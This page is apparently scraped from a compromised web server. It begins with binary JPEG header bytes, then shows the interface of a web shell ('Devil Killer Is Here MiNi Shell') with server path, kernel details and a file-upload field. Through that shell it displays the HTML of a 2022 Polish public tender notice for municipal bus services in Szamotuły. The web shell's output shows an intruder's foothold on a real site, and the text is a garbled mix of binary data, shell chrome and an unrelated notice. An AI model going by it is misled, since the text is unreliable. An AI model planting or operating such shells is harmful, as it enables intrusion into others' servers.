JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221202/0047226901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Obsługa komunikacji miejskiej na terenie Miasta i Gminy Szamotuły w 2023 r.”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto i Gmina Szamotuły</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258230</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dworcowa 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szamotuły</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48612927501</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48612920072</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">umig@szamotuly.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://platformazakupowa.pl/pn/szamotuly</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Obsługa komunikacji miejskiej na terenie Miasta i Gminy Szamotuły w 2023 r.”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b1163441-7217-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00472269</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00040440/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Obsługa komunikacji miejskiej na terenie miasta i gminy Szamotuły w 2023 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/szamotuly <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/szamotuly</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawców dotycząca złożenia,<br/>zmiany i wycofania oferty znajduje się na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-<br/>instrukcje1.Wykonawca może złożyć tylko jedną ofertę. Wykonawca składa ofertę w postaci elektronicznej za pośrednictwem<br/>Platformy.2.<br/>Oferta, wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane<br/>elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. W procesie składania oferty, wniosku w<br/>tym przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty<br/>Wykonawca składa bezpośrednio na dokumencie, który następnie przesyła do systemu. 3. Oferta powinna być: 1. sporządzona na<br/>podstawie załączników niniejszej SWZ w języku polskim, 2. złożona przy użyciu środków komunikacji elektronicznej tzn. za<br/>pośrednictwem platforma zakupowa.pl,3. podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub<br/>podpisem osobistym przez osobę/osoby upoważnioną/upoważnione4. Podpisy kwalifikowane wykorzystywane przez wykonawców<br/>do podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji<br/>elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym<br/>(eIDAS) (UE) nr 910/2014- od 1 lipca 2016 roku”.5. W przypadku wykorzystania formatu podpisu XAdES<br/>zewnętrzny.Zamawiający wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików podpisu w<br/>formacie XAdES.Szczegółowy opis określa SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z treścią rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE L 119 z<br/>04.05.2016), zwanego dalej „RODO”, Miasto i Gmina Szamotuły informuje że:<br/>I. ADMINISTRATOR DANYCH OSOBOWYCH<br/>Administratorem Pani/Pana danych osobowych jest Miasto i Gmina Szamotuły, adres siedziby: ul. Dworcowa 24, 64-500 Szamotuły,<br/>tel. (61) 29-27-576, 568, fax 61 29 20 072, NIP 787-207-44-67, REGON 631258230, zwany dalej Miasto i Gmina Szamotuły.<br/>Inspektor ochrony danych w Mieście i Gminie Szamotuły jest Pani Pani Aleksandra Cnota-Mikołajec, kontakt: iod@eduodo.pl.<br/>II. RODZAJ DANYCH OSOBOWYCH PRZETWARZANYCH PRZEZ ADMINISTRATORA<br/>W ramach postępowania o udzielenie zamówienia, negocjacji umów, procedury ich zawarcia oraz realizacji, Miasto i Gmina<br/>Szamotuły jest Administratorem danych osobowych w odniesieniu do danych osób fizycznych działających w imieniu własnym jako<br/>kontrahenci lub jako przedstawiciele kontrahentów ich pracownicy, współpracownicy lub inne osoby zaangażowane ze strony<br/>kontrahentów w negocjowanie i realizację umów. W ramach powyższego Administrator przetwarza identyfikacyjne i kontaktowe dane<br/>osobowe, w postaci min. imienia, nazwiska, numeru telefonu, adresu e-mail oraz adresu do korespondencji oraz innych danych<br/>wymaganych do wskazania w treści umowy lub w trakcie jej realizacji. Jeżeli w ramach negocjacji, zawarcia lub realizacji zawartej<br/>umowy, kontrahent przekazał Administratorowi dane osobowe swoich przedstawicieli, pracowników lub współpracowników,<br/>wskazuje się że niniejsza klauzula informacyjna ma zastosowanie także do tych osób i powinna zostać tym osobom udostępniona.<br/>W ramach niniejszego postępowania Administrator przetwarza dane, które mogą dotyczyć osób fizycznych działających w imieniu<br/>własnym lub jako przedstawiciele innych podmiotów, których udział w niniejszym postępowaniu związany jest w szczególności z<br/>występowaniem jako(cd.w SWZ)<br/>VIII. WYTYCZNE DLA WYKONAWCY<br/>1. Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia wszystkich obowiązków<br/>formalno-prawnych związanych z udziałem w postępowaniu. Do obowiązków tych należą<br/>m.in. obowiązki wynikające z RODO, w szczególności własny obowiązek informacyjny Wykonawcy, przewidziany w art. 13 RODO,<br/>względem osób fizycznych, których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał. Jednakże<br/>obowiązek informacyjny wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której<br/>dane dotyczą, dysponuje już tymi informacjami (vide: art. 13 ust. 4).<br/>2. Ponadto Wykonawca wypełnia własny obowiązek informacyjny Wykonawcy, wynikający z art. 14 RODO względem osób<br/>fizycznych, których dane przekazuje Zamawiającemu i których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej<br/>jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.<br/>3. Mając na uwadze powyższe, w celu ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane Zamawiającemu przez Wykonawcę oraz celem zapewnienia, że Wykonawca wypełnił wyżej wymienione własne obowiązki<br/>informacyjne, a osoby których dane dotyczą posiadają wiedzę, że ich dane zostały ujawnione Zamawiającemu, Wykonawca składa<br/>wobec Zamawiającego oświadczenie stanowiące Załącznik nr 6 do SWZ, w którego treści Wykonawca potwierdzi wypełnienie przez<br/>Wykonawcę jego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO oraz potwierdzi przekazanie osobom<br/>których dane dotyczą, treści klauzuli informacyjnej Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WI.271.30.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 764448,14 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Wykonawca z którym zostanie podpisana umowa będzie zobowiązany do świadczenia usługi w sposób ciągły i regularny, gwarantujący pasażerom dojazd w wyznaczonym przez rozkłady jazdy w czasie (załącznik 2 do umowy, nr 10 do SWZ), a także sprzedaży biletów za przejazdy pasażerów.<br/>2. Wykonawca zobowiązany jest wykonywać czynności będące przedmiotem zamówienia z należytą starannością, przestrzegając przy tym obowiązujących przepisów.<br/>Wszystkie przewozy muszą być wykonywane przez Wykonawcę punktualnie, zgodnie z rozkładem jazdy.<br/>3. W czasie trwania realizacji zamówienia musi być zapewniona stała obsługa przewozów pasażerów, także w przypadku awarii pojazdu lub innych zdarzeń losowych. Wykonawca zobowiązany jest do podstawienia w tych sytuacjach pojazdu zastępczego w czasie określonym w ofercie. W przypadku postawienia pojazdu zastępczego później aniżeli w czasie, w wskazanym w ofercie, Wykonawcy zostaną naliczone kary zgodnie z umową. Ponadto niepodstawienia pojazdu zastępczego i konieczności wynajęcia pojazdu przez Gminę, Wykonawca zostanie obciążony pełnymi kosztami wynajęcia pojazdu. W/w koszty zostaną potrącone z faktury Wykonawcy za wykonane usługi przewozowe.<br/>4. Wykonawca nie ponosi odpowiedzialności za niewykonanie lub spóźnienie przewozu wskutek działania siły wyższej rozumianej jako zdarzenie nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia i przewidzenia.<br/>5. Wykonawca musi posiadać zainstalowaną w autobusie kasę fiskalną i ewidencjonować sprzedaż biletów.<br/>6. Wykonawca zapewni sprzedaż biletów przez kierowców pojazdów, w taki sposób, aby kierowca pojazdu zawsze dysponował biletami w ilości niezbędnej do zapewnienia ciągłości sprzedaży. Niesprzedawanie biletów pasażerom oraz pobieranie pieniędzy od pasażerów bez wydawania biletu jest zabronione, a w przypadku stwierdzenia takiego faktu, Zamawiający nałoży na Wykonawcę karę w wysokości określonej we wzorze umowy. Wykonawca zobowiązany jest do zapewnienia kontroli posiadania biletów przez pasażerów.<br/>7. Ponadto Zamawiający zastrzega sobie prawo do kontroli przewozów przy pomocy własnych pracowników lub służb specjalistycznych.<br/>8. Usługa ma być świadczona autobusami i busami przystosowanymi do przewozu osób i dopuszczonymi do ruchu, zgodnie z prawem polskim.<br/>9. Autobusy i busy, którymi usługa przewozu będzie świadczona muszą być na bieżąco utrzymywane w czystości wewnątrz i na zewnątrz pojazdu.<br/>10. Pojazdy skierowane do obsługi przewozów muszą być sprawne technicznie. Niedopuszczalne jest przedostawanie się do wnętrza pojazdu spalin i innych nieprzyjemnych zapachów pochodzących od pracującego silnika lub innych podzespołów pojazdu.<br/>11. Wykonawca zobowiązuje się powiadamiać o zauważonych przez kierowcę dewastacjach infrastruktury przystankowej.<br/>12. Wynagrodzenie Wykonawcy stanowić będą wpływy ze sprzedaży biletów normalnych i ulgowych. <br/>13. Wykonawca będzie zobowiązany do przestrzegania ustawy z dnia 20 czerwca 1992 roku o uprawnieniach ulgowych do ulgowych przejazdów środkami publicznego transportu zbiorowego (j.t. Dz. U. z 2012 r., poz. 1138 z późn. zm.) oraz innych uprawnień ustawowych wynikających z odrębnych przepisów, tj.<br/>a) ustawy z dnia 9 maja 1996 roku o wykonywaniu mandatu posła i senatora (j.t. Dz. U. z 2011 r., Nr 7, poz. 29 z późn. zm.);<br/>b) ustawy z dnia 29 maja 1974 roku o zaopatrzeniu inwalidów wojennych i wojskowych oraz ich rodzin (j.t. Dz. U. z 2010 r., Nr 101, poz. 648 z późn. zm.);<br/>c) ustawy z dnia 21 listopada 1967 roku o powszechnym obowiązku obrony Rzeczypospolitej Polskiej (j.t. Dz. U z 2012 r., poz. 461 z późn. zm.);<br/>d) ustawy z dnia 27 lipca 2005 roku - Prawo o szkolnictwie wyższym (j.t. Dz. U. z 2012 r., poz. 572 z późn. zm.);<br/>e) ustawy z dnia 7 września 1991 roku o systemie oświaty (j.t. Dz. U. z 2004 r., Nr 256, poz.2572 z późn. zm.);<br/>f) ustawy z dnia 19 sierpnia 2011 roku o weteranach działań poza granicami państwa (Dz. U. z 2011 r., Nr 205, poz. 1203).<br/>14. Wykonawca zobowiązany jest ponadto do ustanowienia ulg handlowych, przy czym ulgi te nie będą refundowane przez Zamawiającego.<br/>14.1. Osobami uprawnionymi do bezpłatnych przejazdów są:<br/>a) dzieci w wieku do 4 lat (pod warunkiem, że nie zajmują samodzielnie siedzenia),<br/>b) osoby powyżej 70 roku życia za okazaniem dowodu tożsamości,<br/>c) inwalidzi wojenni zaliczani do I grupy inwalidzkiej,<br/>d) osoby posiadające kartę dużej rodziny,<br/>e) osoby posiadające kartę Mieszkańca Szamotuł;<br/>f) uprawnieni funkcjonariusze Policji i Straży Granicznej w czasie akcji.<br/>14.2. Osobami uprawnionymi do ulgowych biletów są:<br/>a) dzieci powyżej 4 lat do rozpoczęcia nauki w szkole podstawowej,<br/>b) dzieci i młodzież w okresie nauki, nie dłużej niż do ukończenia 24 roku życia,<br/>c) studenci do 26 roku życia,<br/>d) osoby niewidome, kombatanci, emeryci, renciści, inwalidzi wojenni nie zaliczani do <br/>I grupy inwalidzkiej, osoby niesamodzielne, osoby uprawnione na podstawie odrębnych aktów prawnych.<br/>Uwaga: <br/>Gmina Szamotuły nie rekompensuje:<br/>	przewoźnikowi wartości ulgi w cenie biletów ulgowych;<br/>	przewoźnikowi straty na przewozie pasażerów z biletami bezpłatnymi.<br/><br/>15.	Wymagania dotyczące pojazdów:<br/>Pojazdy winny spełniać wymogi określone w § 21 Rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 roku w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (j.t. Dz. U. z 2013 r., poz. 951 z późn. zm.), <br/><br/>16.	Wykonawca zobowiązany jest do wyposażenia autobusów w aktualne informacje:<br/>	regulamin przewozu osób,<br/>	obowiązujący cennik opłat,<br/>	wykaz obowiązujących ulg i zwolnień z opłat za przejazdy,<br/>	schemat sieci komunikacyjnej,<br/>	inne informacje i obwieszczenia dotyczące realizacji usług przewozu regularnego osób.<br/>17.	Wykonawca ma obowiązek wyposażyć słupki przystankowe w tabliczki rozkładowe.<br/>18.	Wykonawca jest zobowiązany do przygotowywania, drukowania, uzupełniania brakujących przystankowych rozkładów jazdy.<br/>19.	Wykonawca jest zobowiązany do przedstawienia statystycznego wykorzystania autokarów w okresie kwartalnym na danej linii w i w danych godzinach, tak aby gmina posiadała pełną wiedzę na temat korzystania z przewozów i tak, aby mogła dostosować bezpośrednio do potrzeb mieszkańców w kolejnych latach.<br/>Zamawiający zastrzega możliwość zakazu umieszczania reklam na pojazdach obsługujących komunikację miejską.<br/><br/>Wykonawca zobowiązany jest do oklejenia autobusu napisem:<br/>„KOMUNIKACJA MIEJSKA <br/>MIASTO I GMINA SZAMOTUŁY”<br/>z boku jak i z przodu pojazdu w sposób umożliwiający jego identyfikację przez pasażerów. Forma przytwierdzenia napisu – dowolna (np.: naklejka, mata magnetyczna, wyświetlacze autobusowe) <br/>W przypadku wprowadzenia czasowych zmian w komunikacji wykonawca zobowiązany jest do wywieszenia stosownych informacji na przystankach oraz umieszczenie komunikatu na własnej stronie internetowej (jeżeli posiada) oraz stronie Zamawiającego.<br/>Cena biletów dla pasażerów nie posiadających Karty Mieszkańca na linii nr 1, 2 i 3 wynosi: 4,00 zł - bilet normalny 2,00 zł – bilet ulgowy. <br/><br/><br/>1.	Szczegółowy opis przedmiotu zamówienia stanowi:<br/> - Formularz ofertowy - załącznik nr 1 do SWZ, <br/>	- Projekt umowy - załącznik nr 7 do SWZ,<br/>	- Szczegółowy opis przedmiotu zamówienia - załącznik nr 9 do SWZ;<br/>	- Rozkłady jazdy - załącznik nr 10 do SWZ; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający zastrzega sobie pełne prawo kontrolowania wykonania zlecenia zadań pod względem merytorycznym.<br/>2. Zamawiający zastrzega sobie możliwość modyfikacji rozkładów jazdy oraz tras w związku z potrzebą zmiany wynikającą z zapotrzebowania ze strony osób korzystających z komunikacji miejskiej oraz ze względu na przyczyny dotyczące dróg, np..: remonty, budowa, wyłączenia z ruchu itp. przy tych samych cenach jednostkowych za 1 wozo/kilometr.<br/>3. Zamawiający, w związku z ust. 2, zastrzega sobie możliwość skorzystania z prawa opcji i zwiększenia ilości wozokilometrów do 10% po cenie jednostkowej określonej w ofercie – w przypadku potrzeby wydłużenia tras na podstawie ust. 2 na warunkach określonych w umowie. Zamawiający uprawniony jest do skorzystania z prawa opcji w trakcie realizacji umowy do wyczerpania kwoty określonej powyżej. W przypadku chęci skorzystania z prawa opcji Zamawiający składa Wykonawcy pisemne oświadczenie pod rygorem nieważności (forma równoważna – dokument elektroniczny podpisany kwalifikowanym podpisem elektronicznym) o skorzystaniu z prawa opcji. Wykonawcy nie przysługuje żadne roszczenie w stosunku do Zamawiającego w przypadku, gdy Zamawiający z prawa opcji nie skorzysta. Realizacja zamówienia objętego opcją jest wyłącznie uprawnieniem Zamawiającego. W zakresie realizacji zamówienia objętego prawem opcji zapisy niniejszej Umowy stosuje się odpowiednio. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy (w przypadku udzielenia, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy stanowiących nie więcej niż 20% wartości zamówienia podstawowego polegających na wprowadzeniu dodatkowych linii, kursów lub modyfikacji istniejących linii. Warunki, na jakich będą udzielone ww. zamówienia, będą odpowiadały warunkom określonym w dokumentacji niniejszego postępowania, przez co w szczególności należy rozumieć warunki realizacji robót szczegółowo opisane w projektowanych postanowieniach umowy stanowiących Załącznik nr 7 do SWZ. Zamawiający przeprowadzi stosowne postępowanie w trybie zamówienia z wolnej ręki.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Kryteria oceny ofert i ich znaczenie: <br/><br/>KRYTERIUM	RANGA<br/>Cena (C)	60%<br/>Czas podstawienia pojazdu zastępczego (T)	40%<br/>RAZEM:	100%<br/><br/>2. Kryterium cena (C) będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w ofercie.<br/><br/>Zamawiający przyzna punkty na podstawie poniższego wzoru:<br/>C = Cmin / Co x 60 pkt.<br/>gdzie: Cmin – cena brutto oferty najtańszej<br/> Co – cena brutto oferty ocenianej<br/><br/>3. Kryterium „Czas podstawienia pojazdu zastępczego” (T) –Czas podstawienia pojazdu zastępczego, będzie oceniany wg następującej skali: <br/>Oferta, której wykonawca zaoferuje czas podstawienia pojazdu zastępczego:<br/>a) Do 30 minut – otrzyma 40 pkt.<br/>b) 31 minut - 40 minut – otrzyma 20 pkt. <br/>c) 41 minut – 60 minut – otrzyma 0 pkt. <br/>W przedmiotowym kryterium oceniany będzie czas podstawienia pojazdu zastępczego (liczony w pełnym minutach) w przypadku awarii pojazdu lub innych nieprzewidzianych zdarzeń losowych.<br/>Uwaga: czas 